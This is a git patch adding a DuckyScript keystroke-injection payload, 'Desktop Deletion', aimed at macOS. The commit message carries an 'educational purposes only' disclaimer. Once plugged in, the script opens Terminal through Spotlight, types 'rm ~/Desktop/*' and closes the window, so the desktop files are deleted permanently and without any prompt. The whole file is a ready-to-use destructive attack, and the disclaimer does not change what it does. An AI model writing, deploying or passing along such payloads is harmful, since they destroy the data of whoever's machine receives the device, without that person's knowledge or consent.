From f3b2813eee555458d9de61cdee5e52184d2df00c Mon Sep 17 00:00:00 2001 From: Narsty <132179825+narstybits@users.noreply.github.com> Date: Tue, 9 May 2023 20:41:13 -0500 Subject: [PATCH] Add files via upload This Script will permanently delete all files located on the Desktop. This Script is for educational purposes only and is not intended for Real World Use! The creators of this script are not responsible for any harm or damage that may occur! Please Use Responsibly! --- Executions/Desktop Deletion.txt | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 Executions/Desktop Deletion.txt diff --git a/Executions/Desktop Deletion.txt b/Executions/Desktop Deletion.txt new file mode 100644 index 0000000..3231bdd --- /dev/null +++ b/Executions/Desktop Deletion.txt @@ -0,0 +1,22 @@ +REM Title: Desktop Deletion +REM Author: NARSTY +REM Description: Opens Terminal and enters commands to delete files and folders located on Desktop +REM Please exercise caution when using this command +REM It will permanently delete all files on the desktop without any confirmation prompts +REM Target: MacOS +REM Version: 1.0 +REM Category: Execution + +DELAY 300 +GUI SPACE +DELAY 500 +STRING terminal.app +DELAY 1000 +ENTER +DELAY 1000 +STRING rm ~/Desktop/* +DELAY 2000 +ENTER +DELAY 2000 +GUI W +